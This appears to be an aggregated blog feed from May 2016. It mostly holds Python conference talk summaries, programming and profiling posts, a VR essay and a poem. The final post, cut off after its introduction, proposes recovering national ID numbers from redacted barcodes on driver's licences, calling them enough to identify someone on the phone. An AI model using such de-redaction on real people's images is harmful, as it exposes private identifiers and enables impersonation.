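evens_squared_decl = [n * n for n in range(10) if n % 2 == 0]

assert evens_squared == evens_squared_decl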

He also showed an example with xforms, which is declarative. Projects that use it regularly report a factor of 10 in savings compared to more traditional methods. He mentioned a couple of examples.

Steven doesn't necessarily want us all to jump on Xforms. It might not fit with our usecases. But he does want us to understand that declarative languages are the way to go. The approach has been proven.

In response to a question he compared it to the difference between roman numerals and arabic numerals and the speed difference in using them.

(The sheets will be up on http://homepages.cwi.nl/~steven/Talks/2016/05-13-pygrunn/ later).

by Planet Python at 2016-05-13 14:24

Charlie's Diary

Three Unexpectedly Good Things VR Will Probably Cause - Charlie's Diary


This is a guest post by filmmaker and VR developer Hugh Hancock.

OK, at this point we can call it. VR is definitely here, it works, and it's not going away.

I was one of the first people in the UK to get the consumer version of the HTC Vive, the VR headset designed around standing up and walking around in a virtual space, not just sitting looking at it. I bought it for research rather than because I was sure it would be good - but when it arrived, it was absolutely amazing.

We're in full-on Holodeck territory here. Whether you're shooting ninjas with arrows or wandering around on the bottom of the ocean, it's incredibly immersive. And Valve's legendary "taking a dog for a walk" sim is... well, just spookily good.

So yeah. It arrived. I used it. I promptly put every project on my slate on hold and decided to focus on room-scale VR for the indefinite future.

It's that good.

Now, it's all but guaranteed that we're going to see a lot of scaremongering about VR in the near future. It's ripe for the next moral panic, and there are plenty of people looking for clicks on their articles about how VR must be banned now or it will cause the end of humanity.

So I thought I'd get in there first - with some unforeseen side-effects of VR I've observed or learned about that will make the world better, not worse...

Fitter Nerds

Here's a video of one of the projects I've been experimenting with for the Vive:

It's a fairly simple idea: you're on a raft, on a river. You're holding a paddle (the VR controller, which is tracked to millimeter level by Magic Technology, which means you can move things in the virtual world with your hands). Stick paddle in water, paddle, repeat.

(If you happen to have a Vive, you can download it here - let me know what you think!)

It's fun. It's immersive. And most interestingly, it's rather exhausting. Not quite as much work as paddling a real raft, but you can build up a sweat doing it.

Indeed, currently most of the top room-scale VR experiences combine those three things - fun, immersive, and actual exercise.

Take Hover Junkers, for example, a multiplayer competitive shooting game where you're building defences and blasting away at rivals, both from your own little mini-hovercraft. Here's a video of two people playing a round of Hover Junkers.

It's genuinely very hard work. The amount of squatting you'll do challenges most people's level of physical fitness. But at the same time, it's a highly addictive, very entertaining computer game.

Recommended minimum exercise levels in the UK are approximately 75 minutes of vigorous exercise a week. Most of the population don't even manage to get to that.

Recommended minimum play time to get into DOTA2, one of the most popular competitive computer games available right now, is around 10 hours per week. That's a minimum. Lots of people play a lot more.

(There's a famous review of DOTA2 on Steam which simply reads "Pretty good. Didn't play much.". It has 10,000 hours of play time listed.)

So the result of gaming, particularly competitive gaming, colliding with roomscale VR? Anyone who's into competitive gaming in VR is going to be ripped.

Even those of us who mostly play single-player games will get our exercise minima and then some. One brisk walk across Azeroth in World of Warcraft (with interludes to shoot at, hack apart or run away from the wildlife) or a couple of in-game days of hard manual labour in Stardew Valley will do it.

Forget the stereotype of the overweight gamer - the top gamers of tomorrow are going to be triathlete-level fit.

Less Eyestrain

When I first acquired a VR headset, I took it to my optician to check that it wasn't going to do anything horrible to my eyes. And unexpectedly, rather than giving me a stern talking-to about time spent in front of screens, he got very excited.

It turns out that VR could be rather good for the eyes of anyone using it - much better than using a regular monitor, in many ways.

Why? The main reason is convergence. Humans are evolved to look at the horizon, scanning for prey and predators. Staring at things very close to us, not so much.

If prey's already within 20 inches or so of our face, chances are the deal's done. And if a predator's that close, well, it's a bad day for Ms Hunter-Gatherer and a good day for Captain Stripey McBigTeeth.

(As a side note, we also evolved to look at green things a lot, hence why green is the most relaxing colour for our eyes to stare at. Hence old-school green-text CRT monitors.)

Focusing on something very close to us for 8-12 hours a day is very much not what our eyes are good at, and it's starting to cause serious problems. In fact, my optician recently referred to computer vision syndrome as an "epidemic".

Enter VR.

In a VR headset, you're more or less focusing on infinity, from the point of view of convergence between your two eyes. You're also focusing considerably further away from the point of view of individual eyes, too - approximately 1.2m in the Vive, which is a lot better than 40cm on average for a computer screen.

And in VR, you can simply create any size of screen you like, and work on that. There's an app called Virtual Desktop which allows the user to project his or her usual desktop up onto a massive IMAX-sized screen, and work there.

VR: it's coming to save our eyesight.

Less Mental Illness

And finally, and arguably most exciting of all - VR looks like it's going to have some major applications in treating mental illnesses of all kinds.

Studies are already showing that virtual experiences can be of considerable help in treating paranoia.

It also has a long history of use - hampered by the cost of old-fashioned VR headsets - in treating phobias, from agoraphobia to fear of spiders to fear of flying.

One VR developer reported on Reddit - very excited - that in developing a VR app with some significant height elements, they'd managed to cure their own fear of heights.

And a clinical psychotherapist recently tried out the VR chat application AltSpace VR, and immediately became very excited about the possibilities for treating social anxiety, including his or her own, using AltSpace.

This is pretty remarkable, ground-breaking stuff: arguably offering a lot of the advantages of therapies using LSD or similar drugs that alter perception, without the obvious and unpleasant side effects.

So when the inevitable "VR is causing children to KILL" headlines come along, just remember - change on this scale causes a lot of effects, both good and ill. And it's already obvious there's plenty of likely good outcomes from this particular revolution!

What do you think? Have you tried VR? Noticed any positive effects?

by Hugh Hancock at 2016-05-13 14:17

Planet Python

Python Software Foundation: Python and Open Source Alive and Well in Havana, Cuba - Planet Python

I recently had the amazing opportunity to travel to Havana, Cuba to attend several free software events. My partner, David Mertz, was invited to talk at a meet-up of open-software developers and to present at the International Conference of Free Software sponsored by the Grupo de Usarios de Technologias Libres.
On my first day in Cuba, I attended the tenth Encuentro Social de Desarrolladores. This group, a regular meet-up of open-software developers, just last month held the first "PyDay Havana." At the meeting I attended, approximately 70 people gathered at a local Havana restaurant, La Casa de Potin. I was told that more people were interested in attending, but the space was limited so advance registration was cut off at 70. Several members of the enthusiastic crowd sported PyCon T-shirts--many from PyCon Montreal, perhaps as one could expect, but one from as far back as PyCon Chicago in 2009 (elegance begets simplicity). Clearly, this group has been using Python for quite a while.
I met some wonderful people there: not only Olemis Lang and Medardo Antonio Rodriguez, members of the PSF’s Python-Cuba Work Group with whom I had been in touch previously, but also entrepreneurs and developers who regularly use free software. Justin, a graduate student in Astronomy at Yale, is spending several months in Cuba on a research project using Python. 
Another new connection I made is Abel Meneses Abad, a Computer Science professor at Central University of Las Villas in Santa Clara, Cuba. He told me about his use of Python with his students in Linguistics and his desire to share his experiences and get input from the larger Python community. We should be hearing more from him in the future.
The agenda for the meet-up included talks by Olemis Lang on Brython (and how to sign up for a Brython sprint to be held at the next week’s CubaCon) and by David Mertz on functional programming in Python. 
David Mertz talks about functional programming in Python

Medardo and Stripe Atlas reps address the meet-up
But the talk that garnered the most discussion was a presentation given by Medardo Rodriguez from Merchise Start-Ups on how to start an online business. He was joined by representatives from the San Francisco-based company Stripe, which provides payment processing and business services for start-ups. Their newly launched service Stripe Atlas helps foreign online businesses incorporate in Delaware, enabling them to take advantage of the well-developed business infrastructure in the U.S.

The overall mood of the meet-up was incredibly optimistic–surely a foreshadowing of the positive changes about to take place for Cuban software developers as more intercourse develops with the rest of the world and especially with the U.S. This is a community poised to grow, and I am beyond thrilled that the PSF will be a part of this.
I would love to hear from readers. Please send feedback, comments, or blog ideas to me at msushi@gnosis.cx.

by Planet Python at 2016-05-13 14:06

Planet Python

Reinout van Rees: Pygrunn keynote: Morepath under the hood - Martijn Faassen - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Martijn Faassen is well-known from lxml, zope, grok. Europython, Zope foundation. And he's written Morepath, a python web framework.

Three subjects in this talk:

  • Morepath implementation details.
  • History of concepts in web frameworks
  • Creativity in software development.

Morepath implementation details. A framework with super powers ("it was the last to escape from the exploding planet Zope")

Traversal. In the 1990's you'd have filesystem traversal. example.com/addresses/faassen would map to a file /webroot/addresses/faassen.

In zope2 (1998) you had "traversal through an object tree". So root['addresses']['faassen'] in python. The advantage is that it is all python. The drawback is that every object needs to know how to render itself for the web. It is an example of creativity: how do we map filesystem traversal to objects?

In zope3 (2001) the goal was the zope2 object traversal, but with objects that don't need to know how to handle the web. A way of working called "component architecture" was invented to add traversal-capabilities to existing objects. It works, but as a developer you need to do quite some configuration and registration. Creativity: "separation of concerns" and "lookups in a registry".

Pyramid sits somewhere in between. And has some creativity on its own.

Another option is routing. You map a url explicitly to a function. A @route('/addresses/{name}') decorator to a function (or a django urls.py). The creativity is that it is simple.
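
As a toy illustration of that idea (my sketch, not Morepath's or Django's actual API), a route decorator can simply record the pattern-to-function mapping in a registry that the framework later consults:

# A minimal route registry: the decorator stores which function handles which URL pattern.
ROUTES = {}

def route(pattern):
    def decorator(func):
        ROUTES[pattern] = func
        return func
    return decorator

@route('/addresses/{name}')
def show_address(name):
    return "address page for {0}".format(name)

print(ROUTES)  # {'/addresses/{name}': <function show_address ...>}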

Both traversal and routing have their advantages. So Morepath has both of them. Simple routing to get to the content object and then traversal from there to the view.

The creativity here is "dialectic". You have a "thesis" and an "antithesis" and end up with a "synthesis". So a creative mix between two ideas that seem to be opposites.

Apart from traversal/routing, there's also the registry. Zope's registry (component architecture) is very complicated. He's now got a replacement called "Reg" (http://reg.readthedocs.io/).

He ended up with this after creatively experimenting with it. Just experimenting, nothing serious. Rewriting everything from scratch.

(It turned out there already was something that worked a bit the same in the python standard library: @functools.singledispatch.)
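
For readers who haven't seen it, here is a minimal sketch of that stdlib feature (my example, not from the talk): singledispatch picks an implementation based on the type of the first argument.

from functools import singledispatch

@singledispatch
def render(obj):
    # fallback implementation for any type without a specific registration
    return "<span>{0}</span>".format(obj)

@render.register(list)
def _(items):
    # specialised implementation picked when the first argument is a list
    return "<ul>" + "".join("<li>{0}</li>".format(i) for i in items) + "</ul>"

print(render("hello"))      # <span>hello</span>
print(render(["a", "b"]))   # <ul><li>a</li><li>b</li></ul>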

He later extended it from single dispatch to multiple dispatch. The creativity here was the freedom to completely change the implementation as he was the only user of the library at that moment. Don't be afraid to break stuff. Everything has been invented before (so research). Also creative: it is just a function.

A recent spin-off: "dectate". (http://dectate.readthedocs.io/). A decorator-based configuration system for frameworks :-) Including subclassing to override configuration.

Some creativity here: it is all just subclassing. And split something off into a library for focus, testing and documentation. Split something off to gain these advantages.

by Planet Python at 2016-05-13 13:45

Julia Evans

Investigating Erlang by reading its system calls - Julia Evans

I was helping debug a performance problem (this networking puzzle) in an Erlang program yesterday. I learned that Erlang is complicated, and that we can learn maybe 2 things about it by just looking at what system calls it's running.

Now -- I have never written an Erlang program and don't really know anything about Erlang, so "Erlang seems complicated" isn't meant as a criticism so much as an observation and something I don't really understand. When I'm debugging a program, whether I know the programming language it's written in or not, I often use strace to see what system calls it runs. In my few experiments so far, the Erlang virtual machine runs a TON of system calls and I'm not sure exactly what it's doing. Here are some experimental results.

I write 4 programs: hello.c, hello.java, hello.erl, and hello.py. Here they are.

#include <stdio.h>
int main() {
    printf("hello!\n");
}

class Hello {
    public static void main(String[] args)  {
        System.out.println("hello!");
    }
}

-module(hello).
-export([hello_world/0]).

hello_world() ->
    io:fwrite("Hello, world!\n").

print "hello"

Here are the number of system calls each of these programs made: (you can see the full strace output here). You can generate this yourself with, for instance, strace -f -o python.strace python hello.py

wc -l *.strace
     38 c.strace
   1550 python.strace
   2699 java.strace
  15043 erlang.strace

Unsurprisingly, C comes in at the least. I was surprised that the Erlang VM runs 6 times as many system calls as Java -- I think of Java as already being pretty heavyweight. Maybe this is because Erlang starts up processes on all my cores? The variety of system calls is also interesting to see: I put the system call frequencies in a gist too.
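
If you want to build that kind of frequency table yourself, a rough sketch (mine, not from the post) that tallies syscall names from an strace -f log could look like this; it ignores signal lines and "resumed" continuations.

import re
from collections import Counter

counts = Counter()
with open("erlang.strace") as f:
    for line in f:
        # with strace -f, lines look like: "8682  openat(AT_FDCWD, ...) = 4"
        match = re.match(r"^\d+\s+(\w+)\(", line)
        if match:
            counts[match.group(1)] += 1

for syscall, count in counts.most_common(10):
    print(count, syscall)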

When you look at the system call frequencies, you can see that Erlang is running significantly different kinds of system calls than Java and Python and C. Those 3 languages are mostly doing open, read, lseek, stat, mmap, mprotect, fstat -- all activities around reading a bunch of files & allocating memory, which is what I think of as normal behavior when starting a program.

The top 2 syscalls for the Erlang process are futex and sched_yield. So there's a lot of synchronization happening (the futex), and the operating system threads Erlang starts up keep scheduling themselves off the CPU "ok, I'm done, you go!". There are also a lot of mysterious-to-me ppoll system calls. So Erlang seems like a programming language with really significantly different primitives.

This highly concurrent behavior is consistent with what Wikipedia article says:

Erlang's main strength is support for concurrency. It has a small but powerful set of primitives to create processes and communicate among them.

Let's look a little more carefully at these ppoll system calls for a second. The story starts with

8682  openat(AT_FDCWD, "/sys/devices/system/node/node0", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 4
8703  ppoll([{fd=4, events=POLLIN|POLLRDNORM}, {fd=0, events=POLLIN|POLLRDNORM}], 2, {0, 0}, NULL, 8) = 0 (Timeout)

I have no idea what /sys/devices/system/node/node0 is, but it seems to be a directory and what ppoll is looking for changes to? I don't really get this at all.

One last thing -- erlang runs bind once when it starts. Why does it need to listen on a TCP socket to run hello world? I was very confused about this and unable to figure it out. Some people on twitter thought it might have something to do with epmd, but epmd seems to be a separate process. So I don't know what's going on.

<3 operating systems

I wanted to write this down because, as you all very well know, I think it's interesting to take an operating systems-level approach to understanding what a program is doing and I thought this was a cool example of that.

I had this interesting experience yesterday where I was looking at this Erlang problem with Victor and David and they had OS X machines and I was like "dude I can't debug anything on OS X". So we got it working on my laptop and then I could make a lot more progress. Because now I'm pretty good at OS-level debugging tools, and I've spent a lot of time learning about Linux, and so I'm not super comfortable on non-Linux systems. (I know, I know, dtrace is amazing, I'm going to learn it one day soon, I promise :) )

by Julia Evans at 2016-05-13 13:24

homu + highfive: awesome bots that make open source projects easier - Julia Evans

Someone described my approach to blogging as "fanfiction" recently, a description that I kind of loved. A lot of the time I write about things that I find in the world that I love, and my take on them. So here is a small thing I saw that I liked!

The other day I submitted a pull request to an open source project (rust-lang/libc) for the first time in a while and it was a really delightful experience! There were two bots involved and they were both great.

The first thing that happened is rust-highfive-bot commented. It said:

Thanks for the pull request, and welcome! The Rust team is excited to review your changes, and you should hear from @alexcrichton (or someone else) soon.

I was like YAY! The aforementioned @alexcrichton responded almost immediately, saying

@bors: r+ 1931ee4

Thanks!

Cool! What is this mysterious r+ 1931ee4 incantation? What is he saying? Basically he's saying "this looks reasonable; fine with me as long as the tests pass!" Who is @bors?

bors is the Github account of homu (homu.io), a bot. Homu's job is to make it so that you don't have to keep checking to see if the tests pass! This is a huge blessing on this particular repository because the tests take like an hour. Also, the tests seem to be flaky or something, so they failed a few times and bors took care of rerunning them. Here is the pull request, and you can see it getting merged!

I'm really into homu. It's the second iteration of a piece of software called bors by Graydon Hoare, and there's a great blog post talking about it and highfivebot called Rust infrastructure can be your infrastructure.

by Julia Evans at 2016-05-13 12:56

Planet Python

Reinout van Rees: Pygrunn: from code to config and back again - Jasper Spaans - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Jasper works at Fox IT, one of the programs he works on is DetACT, a fraud detection tool for online banking. The technical summary would be something like "spamassassin and wireshark for internet traffic".

  • Wireshark-like: DetACT intercepts online bank traffic and feeds it to a rule engine that ought to detect fraud. The rule engine is the one that needs to be configured.
  • Spamassassin-like: rules with weights. If a transaction gets too many "points", it is marked as suspect. Just like spam detection in emails.

In the beginning of the tool, the rules were in the code itself. But as more and more rules and exceptions got added, maintaining it became a lot of work. And deploying takes a while as you need code review, automatic acceptance systems, customer approval, etc.

From code to config: they rewrote the rule engine from start to work based on a configuration. (Even though Joel Spolsky says totally rewriting your code is the single worst mistake you can make). They went 2x over budget. That's what you get when rewriting completely....

The initial test with hand-written json config files went OK, so they went to step two: make the configuration editable in a web interface. Including config syntax validation. Including mandatory runtime performance evaluation. The advantage: they could deploy new rules much faster than when the rules were inside the source code.

Then... they did a performance test at a customer.... It was 10x slower than the old code. They didn't have enough hardware to run it. (It needs to run on real hardware instead of in the cloud as it is very very sensitive data).

They fired up the profiler and discovered that only 30% of the time is spent on the actual rules, the other 70% is bookkeeping and overhead.

In the end they had the idea to generate python code from the configuration. They tried it. The generated code is ugly, but it works and it is fast. A 3x improvement. Fine, but not a factor of 10, yet.

They tried converting the config to AST (python's Abstract Syntax Tree) instead of to actual python code. Every block was turned into an AST and then combined based on the config. This is then optimized (which you can do with an AST) before generating python code again.

This was fast enough!
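
To make the general idea concrete, here is a tiny sketch (mine, not Fox-IT's actual engine) of the plumbing involved: turn rule text into an AST, compile it, and get back a real Python function. The real system builds and optimizes AST fragments generated from the configuration rather than parsing hand-written source.

import ast

# Imagine this string was generated from a JSON/YAML rule definition.
rule_source = "def score(tx): return 50 if tx['amount'] > 10000 else 0"

tree = ast.parse(rule_source)            # rule text -> AST (optimizations would happen here)
code = compile(tree, "<rules>", "exec")  # AST -> bytecode
namespace = {}
exec(code, namespace)

print(namespace["score"]({"amount": 25000}))  # 50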

Some lessons learned:

  • Joel Spolsky is right. You should not rewrite your software completely. If you do it, do it in very small chunks.
  • Write readable and correct code first. Then benchmark and profile.
  • Have someone on your team who knows about compiler construction if you want to solve these kinds of problems.

by Planet Python at 2016-05-13 12:56

Reinout van Rees: Pygrunn: simple cloud with TripleO quickstart - K Rain Leander - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

What is openstack? A "cloud operating system". Openstack is an umbrella with a huge number of actual open source projects under it. The goal is a public and/or private cloud.

Just like you use "the internet" without concerning yourself with the actual hardware everything runs on, just in the same way you should be able to use a private/public cloud on any regular hardware.

What is RDO? Exactly the same as openstack, but using RPM packages. Really, it is exactly the same. So a way to get openstack running on a Red Hat enterprise basis.

There are lots of ways to get started. For RDO there are three oft-used ones:

  • TryStack for trying out a free instance. Not intended for production.

  • PackStack. Install openstack-packstack with "yum". Then you run it on your own hardware.

  • TripleO (https://wiki.openstack.org/wiki/TripleO). It is basically "openstack on openstack". You install an "undercloud" that you use to deploy/update/monitor/manage several "overclouds". An overcloud is then the production openstack cloud.

    TripleO has a separate user interface that's different from openstack's own one. This is mostly done to prevent confusion.

    It is kind of heavy, though. The latest openstack release (mitaka) is resource-hungry and needs ideally 32GB memory. That's just for the undercloud. If you strip it, you could get the requirement down to 16GB.

To help with setting up there's now a TripleO quickstart shell script.

by Planet Python at 2016-05-13 11:56

Bluejo's Journal

Visiting France - Bluejo's Journal

I know I won't remember every tree
Nobody could, this new-tipped bushy fir,
This flowering chestnut, all of them will blur,
Into a fuzz of green, unfolding free.

Maybe I'll keep the rivers, Sorgue, Loire, Seine,
Rippling along, which was that bridge at night,
Reflecting in the water silken light?
So history blends Caesar, Charlemagne.

These people walking fast to work or play,
So chic, they smile, disputing what they're told,
As Voltaire walked here with du Chatelet.

A country is too big a thing to hold
And yesterday gets tangled with today
And memories and time turn all leaves gold.

This poem sponsored by my awesome Patreon patrons, and written today on the train between Orleans and Paris.

by Bluejo's Journal (bluejo@gmail.com) at 2016-05-13 11:48

Planet Python

Reinout van Rees: Pygrunn: Understanding PyPy and using it in production - Peter Odding/Bart Kroon - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

pypy is "the faster version of python".

There are actually quite a lot of python implementations. cpython is the main one. There are also JIT compilers. Pypy is one of them. It is by far the most mature. PyPy is a python implementation, compliant with 2.7.10 and 3.2.5. And it is fast!

Some advantages of pypy:

  • Speed. There are a lot of automatic optimizations. It didn't use to be fast, but for the last 5 years it has actually been faster than cpython! It has a "tracing JIT compiler".
  • Memory usage is often lower.
  • Multi core programming. Some stackless features. Some experimental work has been started ("software transactional memory") to get rid of the GIL, the infamous Global Interpreter Lock.

What does having a "tracing JIT compiler" mean? JIT means "Just In Time". It runs as an interpreter, but it automatically identifies the "hot path" and optimizes that a lot by compiling it on the fly.

It is written in RPython, which is a statically typed subset of python which translates to C and is compiled to produce an interpreter. It provides a framework for writing interpreters. "PyPy" really means "Python written in Python".

How to actually use it? Well, that's easy:

$ pypy your_python_file.py

Unless you're using C modules. Lots of python extension modules use C code that compile against CPython... There is a compatibility layer, but that catches only 40-60% of the cases. Ideally, all extension modules would use "cffi", the C Foreign Function Interface, instead of "ctypes". CFFI provides an interface to C that allows lots of optimizations, especially by pypy.
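
For reference, the classic minimal cffi example looks roughly like this (assuming a POSIX system with the cffi package installed):

from cffi import FFI

ffi = FFI()
ffi.cdef("int printf(const char *format, ...);")  # declare the C function we want to call
C = ffi.dlopen(None)                              # load the standard C library
C.printf(b"hello from C via cffi\n")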

Peter and Bart work at paylogic. A company that sells tickets for big events. So you have half a million people trying to get a ticket to a big event. Opening multiple browsers to improve their chances. "You are getting DDOSed by your own customers".

Whatever you do: you still have to handle 500000 pageviews in just a few seconds. The solution: a CDN for the HTML and only small JSON requests to servers. Even then you still need a lot of servers to handle the JSON requests. State synchronisation was a problem as in the end you still had one single server for that single task.

Their results after using pypy for that task:

  • An 8-fold improvement. Initially 4x, but pypy has been optimized since, so they got an extra 2x for free. So: upgrade regularly.
  • Real savings on hosting costs
  • The queue has been tested to work for at least two million visitors now.

Guido van Rossum supposedly says "if you want your code to run faster, you should probably just use PyPy" :-)

Note: slides are online

by Planet Python at 2016-05-13 11:18

Reinout van Rees: Pygrunn: django channels - Bram Noordzij/Bob Voorneveld - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Django channels is a project to make Django handle more than "only" plain http requests. So: websockets, http2, etc. Regular http is the normal request/response cycle. Websockets is a connection that stays open, for bi-directional communication. Websockets are technically an ordered first-in first-out queue with message expiry and at-most-once delivery to only one listener at a time.

"Django channels" is an easy-to-understand extension of the Django view mechanism. Easy to integrate and deploy.

Installing django channels is quick. Just add the application to your INSTALLED_APPS list. That's it. The complexity happens when deploying it as it is not a regular WSGI deployment. It uses a new standard called ASGI (a = asynchronous). Currently there's a "worker service" called daphne (build in parallel to django channels) that implements ASGI.

You need to configure a "backing service". Simplified: a queue.

They showed a demo where everybody in the room could move markers over a map. Worked like a charm.

How it works behind the scenes is that you define "channels". Channels can receive messages and can send messages to other channels. So you can have a channel for reading incoming messages, do something with them and then send a reply back to some output channel. Everything is hooked up with "routes".
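
For a concrete feel, this is roughly what a consumer and a route looked like in the early (1.x-era) channels API; treat it as a sketch and check the documentation for the version you actually install.

# consumers.py -- a consumer is just a function that receives a message
def ws_message(message):
    # echo the incoming websocket frame back on the reply channel
    message.reply_channel.send({"text": message.content["text"]})

# routing.py -- hook the consumer up to the "websocket.receive" channel
from channels.routing import route

channel_routing = [
    route("websocket.receive", ws_message),
]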

You can add channels to groups so that you can, for instance, add the "output" channel of a new connection to the group you use for sending out status messages.

by Planet Python at 2016-05-13 10:22

Planet Python

Reinout van Rees: Pygrunn: Kliko, compute container specification - Gijs Molenaar - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Gijs Molenaar works on processing big data for large radio telescopes ("Meerkat" in the south of Africa and "Lofar" in the Netherlands).

The data volumes coming from such telescopes are huge. 4 terabits per second, for example. So they do a lot of processing and filtering to get that number down. Gijs works on the "imaging and calibration" part of the process.

So: scientific software. Which is hard to install and fragile. Especially for scientists. So they use ubuntu's "launchpad PPAs" to package it all up as debian packages.

The new hit nowadays is docker. Containerization. A self-contained light-weight "virtual machine". Someone called it centralized agony: only one person needs to go through the pain of creating the container and all the rest of the world can use it... :-)

His line of work is often centered around pipelines. Data flows from one step to the other and on to the next. This is often done with bash scripts.

Docker is nice and you can hook up multiple dockers. But... it is all network-centric: a web container plus a database container plus a redis container. It isn't centered on data flows.

So he build something new: kliko. He's got a spec for "kliko" containers. Like "read your input from /input". "Write your output to /output". There should be a kliko.yml that defines the parameters you can pass. There should be a /kliko script as an entry point.

Apart from the kliko container, you also have the "kliko runner". It is the actor that runs the container. It runs the containers with the right parameters. You can pass the parameters on the command line or via a web interface. Perfect for scientists! You get a form where you can fill in the various parameters (defined in the kliko.yml file) and "just" run the kliko container.
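
Purely as an illustration of those conventions (my guess, not taken from the kliko spec itself), a /kliko entry-point script might look something like this; how the parameters from kliko.yml are handed over is deliberately left out, since that is defined by the spec.

#!/usr/bin/env python
import os
import shutil

def main():
    # read everything from /input, "process" it, and write results to /output
    for name in os.listdir("/input"):
        # a real kliko container would run its processing step here instead of copying
        shutil.copy(os.path.join("/input", name), os.path.join("/output", name))

if __name__ == "__main__":
    main()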

An idea: you could use it almost as functional programming: functional containers. Containers that don't change the data they're operating on. Every time you run it on the same input data, you get the same results. And you can run them in parallel per definition. And you can do fun things with caching.

There are some problems with kliko.

  • There is no streaming yet.
  • It is filesystem based at the moment, which is slow.

These are known problems which are fine with what they're currently using it for. They'll work on it, though. One thing they're also looking at is "kliko-compose", so something that looks like "docker-compose".

Some (fundamental) problems with docker:

  • Docker access means root access, basically.
  • GPU acceleration is crap.
  • Cached filesystem layers are just annoying. At first it seems fine that all the intermediary steps in your Dockerfile are cached, but it is really irritating once you install, for instance, debian packages. They're hard to update.
  • You can't combine containers.

by Planet Python at 2016-05-13 08:27

Reinout van Rees: Pygrunn: Micropython, internet of pythonic things - Lars de Ridder - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

micropython is a project that wants to bring python to the world of microprocessors.

Micropython is a lean and fast implementation of python 3 for microprocessors. It was funded in 2013 on kickstarter. Originally it only ran on a special "pyboard", but it has now been ported to various other microprocessors.

Why use micropython? Easy to learn, with powerful features. Native bitwise operations. Ideal for rapid prototyping. (You cannot use cpython, mainly due to RAM usage.)

It is not a full python, of course; they had to strip things out. "functools" and "this" are out, for instance. Added as extras are libraries for the specific boards. There are lots of memory optimizations. Nothing fancy, most of the tricks are directly from compiler textbooks, but it is nice to see it all implemented in a real project.
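
To give a feel for the code, here is the classic pyboard-style blink sketch (this assumes the original pyboard's pyb module; other ports expose a machine module instead):

import pyb

led = pyb.LED(1)       # on-board LED number 1
while True:
    led.toggle()
    pyb.delay(500)     # wait 500 milliseconds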

Some of the supported boards:

  • Pyboard
  • The "BBC micro:bit" which is supplied to 1 million school children!
  • Wipy. More of a professional-grade board.
  • LoPy. a board which supports LoRa, an open network to connect internet-of-things chips.

Development: there is one full time developer (funded by the ESA) and two core contributors. It is stable and feels like it is maturing.

Is it production ready? That depends on your board. It is amazing for prototyping or for embedding in games and tools.

by Planet Python at 2016-05-13 07:34

Random ASCII

UIforETW is No Longer a CPU Hog - Random ASCII

A few months ago I wrote about how many processes on my system were waking up and wasting CPU time for no good reason, thus wasting battery power, electricity, and CPU power. I was surprised that nobody called me out on the hypocrisy of my complaints because UIforETW, my open-source ETW trace recording and management tool, was not well behaved when idle.

This has now been fixed.

UIforETW creates numerous threads that monitor performance related aspects of the system, such as battery drain, CPU power consumption, timer status, user input, etc. These data are emitted as ETW events that show up in the recorded traces and which can then be used to help understand and analyze the ETW traces.

This is all good, and the overhead of these monitoring threads was designed to be small enough that it would not perturb the processes being profiled.

However “small enough overhead” on a busy system is not the same as “small enough overhead” on an idle system. Originally when UIforETW was open but not currently tracing these threads were still running – waking up many times per second, calculating data, and emitting events that were effectively directed to /dev/null.

As of change 72c71dd I’ve rewritten the monitors so that they start and stop with tracing. This dropped the number of context switches and the CPU usage (monitored with sysinternals’ procexp) of an idle UIforETW significantly. However I was still seeing about ten context switches per second. Hmmm…

I used UIforETW\bin\metatrace.bat to record a trace of UIforETW sitting idle. metatrace.bat is useful because it uses a different kernel provider and can therefore be used to profile UIforETW even during trace startup and shutdown. The trace showed that the context switches were on a windows message call stack. I tried using Spy++ to see what type of message was coming in but couldn't get that to work. I then noticed that the bursts of activity were happening exactly once a second, as can be seen on the WPA screenshot below which graphs context switch counts for UIforETW against elapsed time in seconds:

[WPA screenshot: context switch counts for UIforETW against elapsed time in seconds]

A search for SetTimer in the UIforETW source showed a call that I had added months ago. Each time a timer message is received UIforETW checks to see if tracing to a file has been running too long. This is a good feature but doesn't need to be running when tracing is not, so I changed the code so that now the timer only runs during tracing. I also changed it to wake up every thirty seconds instead of every second – precise timing is not relevant for this feature.

The net result of these changes is that now if you have UIforETW running and you aren’t recording a trace then the CPU overhead is zero. UIforETW will go for long periods of time without a single context switch. This means that UIforETW has gone from being a poster-child for a poorly behaved background application to proof that staying perfectly idle is actually quite easy. This blog post was easy to write but I still spent longer writing it than I did making the changes to UIforETW.


It’s worth noting that UIforETW didn’t lose any functionality from these changes. And it’s also worth noting that I did not try to reduce the number of threads, just the number of threads that were waking up for no reason. So, for instance, the DirectoryMonitorThread – which waits on file notification events so that UIforETW can update its trace list automatically – is still running all the time. It wakes up when it needs to do something and is otherwise just sitting on the kernel’s list of threads that don’t need to run.

So, I repeat my entreaty: write your software so that it doesn’t wake up periodically “just in case”. Wake up only when necessary, and be particularly careful about this when your application is not active. If you are wasteful then I will uninstall your software, and encourage others to do likewise.

And you should grab the latest version of UIforETW, for this improvement and a few others.

Aside: What is UIforETW? It’s an open source tool for recording and managing ETW traces to allow investigation of performance problems on Windows in incredible detail. You can find more details here (or at this more memorable url: https://tinyurl.com/etwcentral).


by brucedawson at 2016-05-13 06:16

absorptions

Barcode recovery using a priori constraints - absorptions

Barcodes can be quite resilient to redaction. Not only is the pattern a strong visual signal, but the encoded string also often has a rigidly defined structure. Here I present a method for recovering the data from a blurred, pixelated, or even partially covered barcode using prior knowledge of this higher-layer structure. This goes beyond so-called "deblurring" or blind deconvolution in that it can be applied to distortions other than blur as well.

It has also been a fun exercise in OpenCV matrix operations.

As example data, specimen pictures of Finnish driver's licenses shall be used. The card contains a Code 39 barcode encoding the cardholder's national identification number. This is a fixed-length string with well-defined structure and rudimentary error-detection, so it fits our purpose well. High-resolution samples with fictional data are available at government websites. Redacted and low-quality pictures of real cards are also widely available online, from social media sites to illustrations for news stories.

Nothing on the card indicates that the barcode contains sensitive information (knowledge of a name and this code often suffices as identification on the phone). Consequently, it's not hard to find pictures of cards with the barcode completely untouched either, even if all the other information has been carefully removed.

All cards and codes used in this post are simulated.

Image rectification

